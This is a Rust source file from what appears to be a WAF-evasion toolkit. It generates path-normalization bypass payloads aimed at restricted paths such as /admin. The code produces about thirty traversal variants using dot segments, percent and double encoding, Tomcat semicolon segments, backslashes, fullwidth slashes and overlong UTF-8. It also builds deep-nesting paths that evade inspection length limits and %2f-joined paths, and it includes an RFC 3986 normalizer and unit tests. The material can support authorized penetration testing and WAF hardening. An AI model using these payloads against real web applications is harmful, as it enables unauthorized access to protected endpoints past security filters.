Skip to main content

wafrift_encoding/encoding/
path_norm.rs

//! Path-normalization differential encoders.
//!
//! WAFs and origins frequently disagree on how to normalize a request
//! path. The WAF inspects the raw bytes; the origin (or a middlebox
//! upstream of it) folds them into something else. This module
//! produces the differential payloads — a path that the WAF sees as
//! benign and the origin sees as `/admin`, or vice versa.
//!
//! Every encoder here is reversible by the canonical
//! [RFC 3986 §5.2.4](https://www.rfc-editor.org/rfc/rfc3986#section-5.2.4)
//! "remove dot segments" algorithm. WAFs that don't run that exact
//! algorithm — including most regex-based WAFs and several major
//! cloud-WAF parsers as recently as 2025 — see a different string.
//!
//! Coverage:
//!
//! - **Dot-segment variants**: `/foo/../admin`, `/foo/./admin`,
//!   `/foo/././admin`, `/foo//admin`, `/foo/.//admin`,
//!   `/foo//../admin`. Pure ASCII, RFC-3986 collapse target = `/admin`.
//! - **Percent-encoded dot/slash**: `/foo/%2e%2e/admin` (lower),
//!   `/foo/%2E%2E/admin` (upper), `/foo/%2e%2E/admin` (mixed),
//!   `/foo/%2e%2e%2fadmin`, `/foo/..%2fadmin`, `/foo/.%2e/admin`
//!   (literal-dot + encoded-dot).
//! - **Double percent encoding**: `/foo/%252e%252e/admin` — bypasses
//!   WAFs that decode once and check, while origins that decode twice
//!   collapse to `/admin`.
//! - **Tomcat semicolon segment**: `/foo/..;/admin`. The `..;` is a
//!   single path segment per RFC but Tomcat/Jetty strip the `;<param>`
//!   suffix and re-evaluate, exposing the parent directory.
//! - **Encoded semicolon**: `/foo/..%3b/admin`.
//! - **Backslash variants** (IIS / .NET): `/foo/..\admin`,
//!   `/foo/%5c..%5c/admin`. IIS folds backslash to slash; most WAFs
//!   don't.
//! - **Question-mark suffix smuggle**: `/foo?/../admin` — some WAFs
//!   normalize before query-string split, some after.
//! - **Hash suffix smuggle**: `/foo#/../admin` — same shape.
//! - **Unicode fullwidth slash**: `/foo/／../admin`, where `／` is
//!   U+FF0F FULLWIDTH SOLIDUS. NFKC-folding backends collapse it to `/`.
//! - **Mixed dot encodings**: `/foo/%c0%ae%c0%ae/admin` — overlong UTF-8
//!   for `.`. Combined with `crate::encoding::structural::overlong_utf8`
//!   it's the "mod_security 922110" class.

43use std::borrow::Cow;
44
/// Generate path-normalization differential variants for a target path
/// nested under a benign prefix.
///
/// `prefix` is the segment the WAF sees in the path (e.g. `/public`);
/// any trailing slashes are stripped. `target` is the segment the origin
/// is meant to resolve to (e.g. `/admin`); a leading slash is added when
/// missing, so callers can pass either form.
///
/// Returns roughly 30 candidate paths in a fixed, deterministic order,
/// with no duplicates for ordinary inputs. Not every candidate collapses
/// to `target` under plain RFC 3986 §5.2.4 dot-segment removal: many rely
/// on a backend-specific step (percent-decoding, `;param` stripping,
/// backslash folding, Unicode folding, overlong-UTF-8 decoding) that the
/// inspecting WAF may not perform.
#[must_use]
pub fn path_variants(prefix: &str, target: &str) -> Vec<String> {
    // Normalize callers' inputs so prefix never has a trailing slash
    // and target always has a leading slash.
    let prefix = prefix.trim_end_matches('/');
    let target = if target.starts_with('/') {
        Cow::Borrowed(target)
    } else {
        Cow::Owned(format!("/{target}"))
    };
    let target = target.as_ref();
    // Target without its leading slash(es), for variants that supply their
    // own (possibly encoded) separator in front of it.
    let bare = target.trim_start_matches('/');

    vec![
        // Plain dot-segment and empty-segment shapes.
        format!("{prefix}/..{target}"),
        format!("{prefix}/.{target}"),
        format!("{prefix}/./.{target}"),
        format!("{prefix}/././..{target}"),
        format!("{prefix}//..{target}"),
        format!("{prefix}//../..//.{target}"),
        format!("{prefix}/.//..{target}"),
        format!("{prefix}//..//.{target}"),
        // Percent-encoded dots, in every case combination.
        format!("{prefix}/%2e%2e{target}"),
        format!("{prefix}/%2E%2E{target}"),
        format!("{prefix}/%2e%2E{target}"),
        format!("{prefix}/%2E%2e{target}"),
        // Percent-encoded slash and mixed literal/encoded dots.
        format!("{prefix}/%2e%2e%2f{bare}"),
        format!("{prefix}/..%2f{bare}"),
        format!("{prefix}/%2e./{bare}"),
        format!("{prefix}/.%2e/{bare}"),
        // Double percent encoding.
        format!("{prefix}/%252e%252e{target}"),
        format!("{prefix}/%252e%252e%252f{bare}"),
        // Semicolon path-parameter segments, literal and encoded.
        format!("{prefix}/..;{target}"),
        format!("{prefix}/..%3b{target}"),
        format!("{prefix}/..%3B{target}"),
        format!("{prefix}/..;jsessionid=x{target}"),
        // Backslash separators, literal and encoded.
        format!("{prefix}/..\\{bare}"),
        format!("{prefix}/%5c..%5c{bare}"),
        format!("{prefix}/%5C..%5C{bare}"),
        // Traversal hidden behind a query or fragment delimiter.
        format!("{prefix}?/../{bare}"),
        format!("{prefix}#/../{bare}"),
        // U+FF0F FULLWIDTH SOLIDUS in front of the dot-dot.
        format!("{prefix}/\u{FF0F}..{target}"),
        // Overlong-UTF-8 style encodings of '.'.
        format!("{prefix}/%c0%ae%c0%ae{target}"),
        format!("{prefix}/%c0%2e%c0%2e{target}"),
        // Over-long dot run followed by real traversals.
        format!("{prefix}/.....//../..{target}"),
    ]
}
98
/// Build a deeply-nested benign path that RFC-3986 collapses to
/// `target`.
///
/// Useful when the WAF has a path-length limit (some cap inspection
/// at 256 or 1024 bytes) — every dot-dot segment beyond the limit is
/// silently ignored, while the origin still resolves to the target.
///
/// `depth` is the number of `/segN/..` round-trips to insert, numbered
/// from `seg0`. `target` gets a leading slash if it does not already have
/// one. With `depth == 0` the result is just the (slash-prefixed) target.
#[must_use]
pub fn deep_path_collapse(depth: usize, target: &str) -> String {
    use std::fmt::Write as _;

    // Bytes each round-trip contributes besides the index digits:
    // "/seg" (4) + "/.." (3).
    const FIXED_BYTES_PER_ROUND_TRIP: usize = 7;

    let target = if target.starts_with('/') {
        Cow::Borrowed(target)
    } else {
        Cow::Owned(format!("/{target}"))
    };

    // Upper bound on the digits of any index in 0..depth (digits of `depth`
    // itself), so the buffer is sized once and never has to regrow.
    let max_index_digits = depth.checked_ilog10().map_or(1, |log| log as usize + 1);
    let capacity = depth * (FIXED_BYTES_PER_ROUND_TRIP + max_index_digits) + target.len();
    let mut out = String::with_capacity(capacity);

    for i in 0..depth {
        out.push_str("/seg");
        // Format the index straight into `out` instead of via a temporary String.
        write!(out, "{i}").expect("write to String never fails");
        out.push_str("/..");
    }
    out.push_str(target.as_ref());
    out
}
132
/// Join `segments` into a single path whose separators are all the
/// percent-encoded slash `%2f`, so a WAF that splits on literal `/`
/// sees one segment while an origin that percent-decodes first sees
/// the full path.
///
/// The result always begins with `%2f`: the separator is prepended
/// unless the joined text already starts with it. Segment contents are
/// copied through unchanged. An empty `segments` slice yields `%2f`.
#[must_use]
pub fn slash_encoded_path(segments: &[&str]) -> String {
    const ENCODED_SLASH: &str = "%2f";

    let joined = segments.join(ENCODED_SLASH);
    if joined.starts_with(ENCODED_SLASH) {
        return joined;
    }

    let mut path = String::with_capacity(ENCODED_SLASH.len() + joined.len());
    path.push_str(ENCODED_SLASH);
    path.push_str(&joined);
    path
}
152
/// Apply RFC 3986 §5.2.4 "Remove Dot Segments" to a path. Returns
/// the canonical post-normalization path so tests and oracles can
/// verify that every variant collapses to the same target.
///
/// This follows the reference algorithm step by step (A–E), so it can
/// also serve as the ground-truth normalizer for differential-fuzzing
/// comparisons. No percent-decoding is performed: only literal `.` and
/// `..` segments are recognized.
///
/// As the RFC specifies, a `..` that follows a first segment with no
/// leading slash removes that segment entirely: `a/../b` becomes `/b`.
///
/// # Performance
///
/// A byte cursor (`pos`) advances through the original `input` slice, so
/// the "remaining input" is never copied; only `output` grows, and it is
/// pre-sized to `input.len()`.
#[must_use]
pub fn rfc3986_remove_dot_segments(input: &str) -> String {
    // Step C helper: drop the last segment of the output buffer together
    // with its preceding "/" (if any). With no "/" present the whole
    // buffer is that last segment, so it is cleared.
    fn pop_last_segment(buf: &mut String) {
        let cut = buf.rfind('/').unwrap_or(0);
        buf.truncate(cut);
    }

    // `pos` is the index of the first unconsumed byte of `input`. Where the
    // RFC says "replace the prefix with '/'", the cursor is advanced so
    // that it lands on a "/" already present in `input`.
    let len = input.len();
    let mut pos: usize = 0;
    let mut output = String::with_capacity(len);

    while pos < len {
        let rem = &input[pos..];

        if rem.starts_with("../") {
            // A: remove leading "../".
            pos += 3;
        } else if rem.starts_with("./") {
            // A: remove leading "./".
            pos += 2;
        } else if rem.starts_with("/./") {
            // B: "/./" → "/". Skip "/." so the cursor rests on the next "/".
            pos += 2;
        } else if rem == "/." {
            // B (end of input): "/." → "/", which step E would then move
            // to the output verbatim.
            output.push('/');
            pos = len;
        } else if rem.starts_with("/../") {
            // C: "/../" → "/", and drop the last output segment.
            pop_last_segment(&mut output);
            pos += 3; // cursor rests on the "/" that follows "..".
        } else if rem == "/.." {
            // C (end of input): drop the last output segment, keep the "/".
            pop_last_segment(&mut output);
            output.push('/');
            pos = len;
        } else if rem == "." || rem == ".." {
            // D: input is only "." or ".." — discard it.
            pos = len;
        } else {
            // E: move the first segment (with its leading "/", if any) up to
            // but not including the next "/" into the output.
            let search_from = usize::from(rem.starts_with('/'));
            match rem[search_from..].find('/') {
                Some(rel_idx) => {
                    let seg_end = pos + search_from + rel_idx;
                    output.push_str(&input[pos..seg_end]);
                    pos = seg_end;
                }
                None => {
                    output.push_str(rem);
                    pos = len;
                }
            }
        }
    }
    output
}
231
/// Unit tests for the path-normalization encoders and the RFC 3986
/// dot-segment canonicalizer.
#[cfg(test)]
mod tests {
    use super::*;
    use std::collections::HashSet;
    use std::time::{Duration, Instant};

    // ── rfc3986_remove_dot_segments ─────────────────────────────────────────

    #[test]
    fn rfc3986_collapses_dot_dot() {
        assert_eq!(rfc3986_remove_dot_segments("/a/b/c/./../../g"), "/a/g");
    }

    #[test]
    fn rfc3986_collapses_pure_dot_segments() {
        assert_eq!(rfc3986_remove_dot_segments("/./a"), "/a");
        assert_eq!(rfc3986_remove_dot_segments("/a/./b"), "/a/b");
    }

    #[test]
    fn rfc3986_collapses_trailing_dot_dot() {
        assert_eq!(rfc3986_remove_dot_segments("/a/b/.."), "/a/");
    }

    #[test]
    fn rfc3986_handles_root_dot_dot() {
        // Traversing above the root leaves just the root: step C replaces
        // "/.." with "/" and there is no output segment to remove.
        assert_eq!(rfc3986_remove_dot_segments("/.."), "/");
    }

    // ── path_variants ───────────────────────────────────────────────────────

    #[test]
    fn path_variants_count_is_high() {
        let variants = path_variants("/public", "/admin");
        // Count distinct entries, not raw length, so duplicates don't
        // inflate the figure.
        let distinct: HashSet<&String> = variants.iter().collect();
        assert!(
            distinct.len() >= 25,
            "should produce at least 25 distinct variants, got {}",
            distinct.len()
        );
    }

    #[test]
    fn path_variants_handle_no_leading_slash_in_target() {
        let with_slash = path_variants("/public", "/admin");
        let without_slash = path_variants("/public", "admin");
        assert_eq!(
            with_slash.len(),
            without_slash.len(),
            "leading slash in target shouldn't change variant count"
        );
    }

    #[test]
    fn path_variants_handle_trailing_slash_in_prefix() {
        let no_trailing = path_variants("/public", "/admin");
        let trailing = path_variants("/public/", "/admin");
        // Compare whole vectors: a pairwise zip would silently pass if one
        // list were shorter than the other.
        assert_eq!(
            no_trailing, trailing,
            "trailing slash must be stripped from prefix"
        );
    }

    #[test]
    fn path_variants_contain_dot_dot() {
        let variants = path_variants("/x", "/y");
        assert!(variants.iter().any(|v| v.contains("..")));
    }

    #[test]
    fn path_variants_contain_percent_encoded() {
        let variants = path_variants("/x", "/y");
        assert!(
            variants
                .iter()
                .any(|v| v.contains("%2e") || v.contains("%2E"))
        );
    }

    #[test]
    fn path_variants_contain_double_encoded() {
        let variants = path_variants("/x", "/y");
        assert!(variants.iter().any(|v| v.contains("%252e")));
    }

    #[test]
    fn path_variants_contain_tomcat_semicolon() {
        let variants = path_variants("/x", "/y");
        assert!(variants.iter().any(|v| v.contains("..;")));
    }

    #[test]
    fn path_variants_contain_backslash() {
        let variants = path_variants("/x", "/y");
        assert!(
            variants
                .iter()
                .any(|v| v.contains('\\') || v.contains("%5c") || v.contains("%5C"))
        );
    }

    #[test]
    fn path_variants_contain_fullwidth() {
        let variants = path_variants("/x", "/y");
        assert!(variants.iter().any(|v| v.contains('\u{FF0F}')));
    }

    #[test]
    fn path_variants_contain_overlong_utf8() {
        let variants = path_variants("/x", "/y");
        assert!(variants.iter().any(|v| v.contains("%c0%ae")));
    }

    #[test]
    fn path_variants_all_nonempty() {
        for v in path_variants("/p", "/t") {
            assert!(!v.is_empty(), "no variant may be empty");
        }
    }

    #[test]
    fn path_variants_are_deterministic() {
        let a = path_variants("/p", "/t");
        let b = path_variants("/p", "/t");
        assert_eq!(a, b);
    }

    #[test]
    fn all_variants_canonicalize_to_target_or_above() {
        // For the basic "/admin" target, every variant should
        // RFC-3986 to something containing "admin" (the dot
        // collapse + percent decode is not done here, but the
        // dot-collapse half is enough to verify directionality).
        let variants = path_variants("/x", "/admin");
        for v in &variants {
            // Strip query / fragment for the canonicalizer.
            let stripped = v.split('?').next().unwrap_or(v);
            let stripped = stripped.split('#').next().unwrap_or(stripped);
            let collapsed = rfc3986_remove_dot_segments(stripped);
            // Either the collapsed path mentions admin (after the dot-dot took us
            // up), OR the variant uses an opaque encoding the RFC canonicalizer
            // can't see through (percent-encoded dots/slashes/backslashes,
            // fullwidth slash), OR the variant embeds the traversal in the query /
            // fragment component (e.g. `?/../admin` — not visible to the path
            // canonicalizer but processed by many origin servers).  All are
            // legitimate differential conditions — what matters is that the
            // variant doesn't accidentally fold to the benign prefix alone.
            let touched_target = collapsed.contains("admin")
                || v.contains("%2e")
                || v.contains("%2E")
                || v.contains("%252e")
                || v.contains("%c0%ae")
                || v.contains('\\')
                || v.contains("%5c")
                || v.contains("%5C")
                || v.contains('\u{FF0F}')
                // query-string / fragment traversal: `?/../` or `#/../`
                || (v.contains("?/") && v.contains("../"))
                || (v.contains('#') && v.contains("../"));
            assert!(
                touched_target,
                "variant must encode dot-dot or reach admin: {v} → {collapsed}"
            );
        }
    }

    // ── deep_path_collapse ──────────────────────────────────────────────────

    #[test]
    fn deep_path_collapse_known_depth() {
        let p = deep_path_collapse(5, "/admin");
        assert!(p.contains("seg0/.."));
        assert!(p.contains("seg4/.."));
        assert!(p.ends_with("/admin"));
    }

    #[test]
    fn deep_path_collapse_resolves_to_target() {
        let p = deep_path_collapse(10, "/admin");
        // RFC 3986 normalization must yield "/admin" because every
        // "segN/.." cancels out.
        let collapsed = rfc3986_remove_dot_segments(&p);
        assert_eq!(collapsed, "/admin", "deep nesting must collapse: {p}");
    }

    #[test]
    fn deep_path_collapse_zero_depth() {
        let p = deep_path_collapse(0, "/admin");
        assert_eq!(p, "/admin");
    }

    #[test]
    fn large_depth_does_not_panic() {
        let p = deep_path_collapse(1000, "/admin");
        assert!(p.ends_with("/admin"));
    }

    // ── slash_encoded_path ──────────────────────────────────────────────────

    #[test]
    fn slash_encoded_path_basic() {
        let p = slash_encoded_path(&["admin", "users"]);
        assert!(p.contains("%2f") || p.contains("%2F"));
        assert!(p.contains("admin"));
        assert!(p.contains("users"));
        assert!(!p.contains("/admin"), "no literal slash in segment: {p}");
    }

    #[test]
    fn slash_encoded_path_always_starts_encoded() {
        let p = slash_encoded_path(&["x"]);
        assert!(p.starts_with("%2f"));
    }

    // ── Speed regression tests ──────────────────────────────────────────────

    /// `rfc3986_remove_dot_segments` on a 400-segment path must complete in
    /// under 50 ms (100 repetitions, debug build). The cursor-based
    /// implementation walks the original slice without copying the
    /// remaining input on each step.
    #[test]
    fn rfc3986_cursor_throughput() {
        // Build a long path: /seg0/../seg1/../ … /seg199/../final
        // (200 round-trips of two segments each).
        let mut path = String::new();
        for i in 0..200 {
            path.push_str(&format!("/seg{i}/.."));
        }
        path.push_str("/final");

        let start = Instant::now();
        for _ in 0..100 {
            let _ = rfc3986_remove_dot_segments(&path);
        }
        let elapsed = start.elapsed();
        assert!(
            elapsed < Duration::from_millis(50),
            "rfc3986_remove_dot_segments 100× on 400-segment path took {elapsed:?}; expected < 50 ms (debug build)"
        );
    }

    /// Correctness pin: the cursor-based implementation must produce the
    /// expected result on known RFC 3986 §5.2.4 style inputs.
    #[test]
    fn rfc3986_cursor_correctness_rfc_examples() {
        let cases = [
            ("/a/b/c/./../../g", "/a/g"),
            ("/a/./b", "/a/b"),
            ("/a/../b", "/b"),
            ("/a/b/../..", "/"),
            ("/../a", "/a"),
            ("/", "/"),
            ("", ""),
        ];
        for (input, expected) in cases {
            assert_eq!(
                rfc3986_remove_dot_segments(input),
                expected,
                "input={input:?}"
            );
        }
    }

    /// `deep_path_collapse` with depth=1000, run 10 times, must complete in
    /// under 5 ms. The index is written straight into the pre-allocated
    /// output buffer rather than through a temporary `String`.
    #[test]
    fn deep_path_collapse_throughput() {
        let start = Instant::now();
        for _ in 0..10 {
            let p = deep_path_collapse(1000, "/admin");
            assert!(p.ends_with("/admin"));
        }
        let elapsed = start.elapsed();
        assert!(
            elapsed < Duration::from_millis(5),
            "deep_path_collapse(1000) × 10 took {elapsed:?}; expected < 5 ms"
        );
    }
}